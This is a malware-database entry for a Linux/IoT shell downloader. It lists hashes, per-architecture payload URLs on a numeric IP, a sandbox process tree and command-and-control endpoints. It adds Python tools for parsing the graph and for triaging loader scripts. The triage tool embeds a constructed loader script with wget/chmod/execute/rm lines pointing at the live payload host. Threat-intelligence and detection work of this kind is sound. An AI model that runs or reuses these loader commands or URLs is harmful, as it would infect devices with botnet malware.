MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 cdaf8485af1ebdcd4626a39ff323dfba5c4f9cc434b68169f194b3201bd3125a. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



Threat unknown


Vendor detections: 5



SHA256 hash: cdaf8485af1ebdcd4626a39ff323dfba5c4f9cc434b68169f194b3201bd3125a
SHA3-384 hash: 51b336ff420285e1599e871279993cbf6942d9048509be922164ccc9dbd8f769a2f8e817836e9cdf87114f7e370b7c47
SHA1 hash: c308027a420b1d8c9fb6ab79310e2e74f730e895
MD5 hash: 40e782a24f87367998a855dd090b68a2
humanhash: ohio-utah-carolina-lamp
File name: android.sh
File size: 1'446 bytes
First seen: 2026-05-22 00:51:56 UTC
Last seen: Never
File type: sh
MIME type: text/plain
ssdeep: 24:qmMVTeyv2Uqm75kOvpdHeWkS7tTTNoGz5tNtKAXpYFpdk9Xr0CeUCxucnubpf26o:qHVTz2UbkOX/5TuGz5nwAXph/eUCxucX
TLSH: T1E031B1DE08F0B113D998DECCB075C964940095EA36E92629EDEC9C32CDE56B4B0A7F4D
Magika: txt
Reporter: abuse_ch
Tags: sh
IOCs

URLs referenced by this sample (one payload per target architecture, all served from the same host; "n/a" means the downloaded payload has no MalwareBazaar entry and no signature):

URL | Malware sample (SHA256 hash) | Signature | Tags
http://176.65.139.188/zzxbzbpq/mzpirni.arm | n/a | n/a | arm elf ua-wget
http://176.65.139.188/zzxbzbpq/pbjwfob.arm5 | n/a | n/a | arm elf ua-wget
http://176.65.139.188/zzxbzbpq/rzqgpso.arm6 | n/a | n/a | arm elf ua-wget
http://176.65.139.188/zzxbzbpq/djvefcm.arm7 | n/a | n/a | arm elf ua-wget
http://176.65.139.188/zzxbzbpq/xpbtiwv.aarch64 | n/a | n/a | arm elf ua-wget
http://176.65.139.188/zzxbzbpq/gpzhoxc.mips64 | n/a | n/a | elf mips ua-wget
http://176.65.139.188/zzxbzbpq/nrfhtqi.mips | n/a | n/a | elf mips ua-wget
http://176.65.139.188/zzxbzbpq/wgstmum.mpsl | n/a | n/a | elf mips ua-wget
http://176.65.139.188/zzxbzbpq/yxvnqde.ppc | n/a | n/a | elf PowerPC ua-wget
http://176.65.139.188/zzxbzbpq/lwsjpul.x86_64 | n/a | n/a | elf ua-wget x86
http://176.65.139.188/zzxbzbpq/hxwdesw.i686 | n/a | n/a | elf ua-wget x86
http://176.65.139.188/zzxbzbpq/ijjlglb.i586 | n/a | n/a | elf ua-wget x86
http://176.65.139.188/zzxbzbpq/cbcicvq.i486 | n/a | n/a | elf ua-wget x86

Intelligence

File Origin
# of uploads: 1
# of downloads: 58
Origin country: DE

Vendor Threat Intelligence

No detections

Verdict: Malicious
Threat level: 10/10
Confidence: 100%
Tags: evasive zero-day
Status: terminated
Behavior Graph (process tree reconstructed from the sandbox graph; pids and bracketed flags are the sandbox's own annotations; an exe of "memfd:" means the process image is an anonymous memory file, i.e. the payload was executed without being written to disk):

/usr/bin/sudo (pid 2886)
  execve -> /tmp/sample.bin (pid 2895)
    nine rounds of: execve -> /usr/bin/wget [net send-data write-file], execve -> /usr/bin/chmod, clone -> /usr/bin/dash
      wget pids 2898, 2930, 2945, 2963, 2984, 3005, 3033, 3072, 3098
      chmod pids 2926, 2941, 2960, 2979, 3001, 3028, 3065, 3091, 3123
      dash pids 2927, 2942, 2961, 2981, 3002, 3030, 3067, 3093, 3124
    execve -> /usr/bin/wget (pid 3128) [net send-data write-file]
    execve -> /usr/bin/chmod (pid 3148)
    execve -> memfd: (pid 3150) [delete-file write-file]
      clone -> memfd: (pids 3158, 3163, 3164)
      clone -> memfd: (pid 3165) [zombie]
        clone -> memfd: (pid 3167)
          clone -> memfd: (pid 3168) [dns net send-data write-file]
            clone -> memfd: (pids 3170, 3171, 3179)
              pid 3170: clone -> memfd: (pid 5493)
    execve -> /usr/bin/wget (pid 3166) [net send-data write-file]
    execve -> /usr/bin/chmod (pid 3194)
    execve -> memfd: (pid 3196) [write-file]
    clone -> /usr/bin/dash (pids 3202, 3203)
    execve -> /usr/bin/rm (pid 3204) [delete-file]

Network activity:
  176.65.139.188:80 receives one request each from the eleven wget processes (pids 2898, 2930, 2945, 2963, 2984, 3005, 3033, 3072, 3098, 3128, 3166), 149-153 bytes per request
  9.9.9.9:53 and 8.8.8.8:53 each receive 43 bytes from pid 3168 (DNS)
  criminalcloudflare.online:1337 receives 256 bytes from pid 3168
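
The raw graph above is hard to read in its dumped form, so the following Python is an added example (not MalwareBazaar's or the sandbox vendor's code) that parses that dump format back into a process tree and a per-process network map, then pulls out what an analyst wants from it: which processes are memfd-backed, their lineage back to the sample, and which endpoints they talk to. GRAPH is an abridged excerpt of this page's graph (guuids shortened, the intermediate memfd clones between pid 3150 and pid 3168 dropped); the token grammar the parser assumes is the one visible in the dump and is stated in the docstring, and the classification of ":53" endpoints as DNS and of wget endpoints as the stager host is my assumption.

```python
"""Rebuild a sandbox behavior graph dump into a process tree and network map.

Assumed token format (taken from the dump on this page):
  process node: guuid=<id> pid=<n> <exe-path|memfd:> [flag ...]
  process edge: guuid=<id> pid=<n>->guuid=<id> pid=<m> execve|clone
  endpoint:     <uuid> <host>:<port>
  network edge: guuid=<id> pid=<n>-><uuid> send: <bytes>B
"""
import re

# Abridged excerpt of the page's behavior graph (constructed from it, not a verbatim copy).
GRAPH = (
    "guuid=c7e8c878-1b00 pid=2886 /usr/bin/sudo "
    "guuid=75be017b-1b00 pid=2895 /tmp/sample.bin "
    "guuid=c7e8c878-1b00 pid=2886->guuid=75be017b-1b00 pid=2895 execve "
    "guuid=7e63597b-1b00 pid=2898 /usr/bin/wget net send-data write-file "
    "guuid=75be017b-1b00 pid=2895->guuid=7e63597b-1b00 pid=2898 execve "
    "guuid=0cf49d86-1b00 pid=2926 /usr/bin/chmod "
    "guuid=75be017b-1b00 pid=2895->guuid=0cf49d86-1b00 pid=2926 execve "
    "guuid=1f2dc6ef-1b00 pid=3150 memfd: delete-file write-file "
    "guuid=75be017b-1b00 pid=2895->guuid=1f2dc6ef-1b00 pid=3150 execve "
    "guuid=e26f0eff-1b00 pid=3204 /usr/bin/rm delete-file "
    "guuid=75be017b-1b00 pid=2895->guuid=e26f0eff-1b00 pid=3204 execve "
    "bbf5bc96-9f47-54ce-aa51-70672524d0f0 176.65.139.188:80 "
    "guuid=7e63597b-1b00 pid=2898->bbf5bc96-9f47-54ce-aa51-70672524d0f0 send: 149B "
    "guuid=0328b8f3-1b00 pid=3168 memfd: dns net send-data write-file "
    "guuid=1f2dc6ef-1b00 pid=3150->guuid=0328b8f3-1b00 pid=3168 clone "
    "80639f7d-8d8e-5d60-8819-65337bb0e774 criminalcloudflare.online:1337 "
    "guuid=0328b8f3-1b00 pid=3168->80639f7d-8d8e-5d60-8819-65337bb0e774 send: 256B "
    "a0528efd-1018-56b4-b518-221acb0fa7ca 9.9.9.9:53 "
    "guuid=0328b8f3-1b00 pid=3168->a0528efd-1018-56b4-b518-221acb0fa7ca send: 43B "
)

UUID = r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}"
# A node is "guuid=.. pid=.. <exe>" followed by zero or more lowercase flags; the
# lookbehind keeps the target half of an edge ("->guuid=..") from being read as a node,
# and the lookahead keeps the next "guuid=" token from being read as a flag.
NODE_RE = re.compile(r"(?<!->)guuid=(\S+) pid=(\d+) (/\S+|memfd:)"
                     r"((?: [a-z]+(?:-[a-z]+)*(?= |$))*)")
PROC_EDGE_RE = re.compile(r"guuid=(\S+) pid=(\d+)->guuid=(\S+) pid=(\d+) (execve|clone)")
NET_NODE_RE = re.compile(rf"(?<![\w>=-])({UUID}) (\S+:\d+)")
NET_EDGE_RE = re.compile(rf"guuid=(\S+) pid=(\d+)->({UUID}) send: (\d+)B")


def _proc(exe="?", flags=()):
    return {"exe": exe, "flags": list(flags), "parent": None, "children": [], "net": {}}


def parse_graph(text):
    """Return {pid: record}; record['net'] maps 'host:port' -> bytes sent."""
    procs = {}
    for _guuid, pid, exe, flags in NODE_RE.findall(text):
        procs[int(pid)] = _proc(exe, flags.split())
    for _p, ppid, _c, cpid, how in PROC_EDGE_RE.findall(text):
        parent = procs.setdefault(int(ppid), _proc())   # tolerate edges to undeclared pids
        child = procs.setdefault(int(cpid), _proc())
        child["parent"] = (int(ppid), how)
        parent["children"].append(int(cpid))
    endpoints = dict(NET_NODE_RE.findall(text))          # uuid -> host:port
    for _g, pid, uuid, nbytes in NET_EDGE_RE.findall(text):
        net = procs.setdefault(int(pid), _proc())["net"]
        dest = endpoints.get(uuid, uuid)
        net[dest] = net.get(dest, 0) + int(nbytes)
    return procs


def lineage(procs, pid):
    """Exe names from the root process down to pid."""
    chain = []
    while pid is not None:
        chain.append(procs[pid]["exe"])
        link = procs[pid]["parent"]
        pid = link[0] if link else None
    return chain[::-1]


def memfd_pids(procs):
    """Processes whose image is an anonymous memory file (file-less execution)."""
    return sorted(pid for pid, rec in procs.items() if rec["exe"] == "memfd:")


def stage2_contacts(procs):
    """Endpoints reached by memfd-backed processes, DNS (port 53) excluded: C2 candidates."""
    return {ep for pid in memfd_pids(procs) for ep in procs[pid]["net"] if not ep.endswith(":53")}


def summarize(procs):
    by_exe = {}
    for pid, rec in procs.items():
        by_exe.setdefault(rec["exe"], []).append(pid)
    return {
        "process_count": len(procs),
        "by_exe": {exe: sorted(pids) for exe, pids in by_exe.items()},
        # assumption: whatever wget talks to is the stager host serving the per-arch payloads
        "stager_endpoints": {ep for r in procs.values() if r["exe"].endswith("/wget") for ep in r["net"]},
        "dns_resolvers": {ep for r in procs.values() for ep in r["net"] if ep.endswith(":53")},
        "memfd_pids": memfd_pids(procs),
        "stage2_contacts": stage2_contacts(procs),
    }


if __name__ == "__main__":
    g = parse_graph(GRAPH)
    for pid in memfd_pids(g):
        print(pid, " -> ".join(lineage(g, pid)), g[pid]["net"])
    print(summarize(g))
```

Feeding the full dump from the page to `parse_graph` works the same way, since the regexes key on the token shapes rather than on the abridged ids; the useful output is `stage2_contacts`, which separates the stager host the script itself downloads from (port 80, contacted by wget) from the endpoint the in-memory second stage contacts on its own (port 1337).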
Threat name: Script-Shell.Downloader.SAgnt
Status: Malicious
First seen: 2026-05-22 00:54:33 UTC
File Type: Text (Shell)
AV detection: 10 of 24 (41.67%)
Threat level: 3/5

Result
Malware family: n/a
Score: 3/10
Tags: n/a
Behaviour (as reported by this vendor; "Modifies registry class" and "Suspicious use of SetWindowsHookEx" are Windows-only indicators that cannot apply to a POSIX shell script, so treat these three lines as a Windows-sandbox artifact rather than as behaviour of this sample):
Modifies registry class
Suspicious use of SetWindowsHookEx
Enumerates physical storage devices
Please note that we are no longer able to provide a coverage score for Virus Total.

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:MAL_Linux_IoT_MultiArch_BotnetLoader_Generic
Author:Anish Bogati
Description:Technique-based detection of IoT/Linux botnet loader shell scripts downloading binaries from numeric IPs, chmodding, and executing multi-architecture payloads
Reference:MalwareBazaar sample lilin.sh
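
The YARA description above and the IOC table earlier on the page describe the same technique: a shell script that fetches one ELF per architecture from a numeric IP, marks it executable, runs it and deletes it. The following Python is an added example (not the page's code, not the YARA rule, and not the contents of android.sh, which the page does not show) of a static triage helper for such scripts: it extracts the download URLs, classifies the target architecture from the file suffix, and checks each line for the download, chmod, execute and delete chain. SAMPLE_SCRIPT is a constructed stand-in built from four of the URLs in the IOC table; ARCH_BY_SUFFIX is my own mapping of the suffixes seen in that table, an assumption rather than anything the sample states.

```python
"""Static triage of a multi-architecture Linux/IoT loader script (added example)."""
import ipaddress
import re
from urllib.parse import urlparse

# Constructed stand-in, NOT the real android.sh: each line follows the
# download -> chmod -> execute -> delete cycle, using URLs from the page's IOC table.
SAMPLE_SCRIPT = """\
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://176.65.139.188/zzxbzbpq/mzpirni.arm; chmod +x mzpirni.arm; ./mzpirni.arm; rm -rf mzpirni.arm
wget http://176.65.139.188/zzxbzbpq/xpbtiwv.aarch64; chmod +x xpbtiwv.aarch64; ./xpbtiwv.aarch64; rm -rf xpbtiwv.aarch64
wget http://176.65.139.188/zzxbzbpq/nrfhtqi.mips; chmod 777 nrfhtqi.mips; ./nrfhtqi.mips; rm -rf nrfhtqi.mips
wget http://176.65.139.188/zzxbzbpq/lwsjpul.x86_64; chmod +x lwsjpul.x86_64; ./lwsjpul.x86_64; rm -rf lwsjpul.x86_64
"""

# Assumed mapping of payload-name suffixes (as seen in the IOC table) to architecture families.
ARCH_BY_SUFFIX = {
    "arm": "arm", "arm5": "arm", "arm6": "arm", "arm7": "arm", "aarch64": "arm64",
    "mips": "mips", "mips64": "mips", "mpsl": "mips", "ppc": "powerpc",
    "x86_64": "x86", "i686": "x86", "i586": "x86", "i486": "x86",
}
URL_RE = re.compile(r"https?://[^\s;'\"|&<>]+")
# A wget/curl invocation and the first URL on its command line.
FETCH_RE = re.compile(r"\b(?:wget|curl)\b[^;|&\n]*?(https?://[^\s;'\"|&<>]+)")


def extract_urls(script):
    return URL_RE.findall(script)


def classify(url):
    """Host, port, payload file name, guessed architecture and whether the host is a bare IP."""
    p = urlparse(url)
    host = p.hostname or ""
    fname = p.path.rsplit("/", 1)[-1]
    suffix = fname.rsplit(".", 1)[-1] if "." in fname else ""
    try:
        ipaddress.ip_address(host)
        numeric = True
    except ValueError:
        numeric = False
    return {"url": url, "host": host, "port": p.port or 80, "file": fname,
            "arch": ARCH_BY_SUFFIX.get(suffix, "unknown"), "numeric_host": numeric}


def loader_chains(script):
    """One record per line that downloads a file, chmods it and runs it as ./name or /path/name."""
    found = []
    for line in script.splitlines():
        for m in FETCH_RE.finditer(line):
            url = m.group(1)
            fname = urlparse(url).path.rsplit("/", 1)[-1]
            if not fname:
                continue
            f = re.escape(fname)
            chmod = re.search(rf"\bchmod\s+(?:\+x|[0-7]{{3,4}})\s+(?:\S*/)?{f}(?=\s|$|[;&|])", line)
            exe = re.search(rf"(?:^|[;&|]\s*)(?:\./|/\S*/){f}(?=\s|$|[;&|])", line)
            rm = re.search(rf"\brm\b[^;|&]*\b{f}(?=\s|$|[;&|])", line)
            if chmod and exe:
                found.append({**classify(url), "cleanup": bool(rm)})
    return found


def verdict(script):
    chains = loader_chains(script)
    archs = sorted({c["arch"] for c in chains})
    return {
        "is_multiarch_loader": len(chains) >= 2 and len(archs) >= 2,
        "numeric_ip_download": any(c["numeric_host"] for c in chains),
        "hosts": sorted({c["host"] for c in chains}),
        "archs": archs,
        "chains": chains,
    }


if __name__ == "__main__":
    v = verdict(SAMPLE_SCRIPT)
    print("multi-arch loader:", v["is_multiarch_loader"], "| numeric-IP download:", v["numeric_ip_download"])
    print("block:", v["hosts"], "| archs:", v["archs"])
    for c in v["chains"]:
        print(f'  {c["arch"]:<8} {c["file"]:<18} cleanup={c["cleanup"]}  {c["url"]}')
```

`verdict(...)["hosts"]` is the blocklist a responder wants first; the per-chain records give the per-architecture file names to search for in /tmp and in process listings. The regexes only cover the wget/curl plus "./name" shape the YARA description refers to; a script that pipes the download straight into sh needs an additional rule.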

File information


The information below gives the delivery method and external references for this sample.

File type: sh
SHA256 hash: cdaf8485af1ebdcd4626a39ff323dfba5c4f9cc434b68169f194b3201bd3125a (this sample)
Delivery method: Distributed via web download
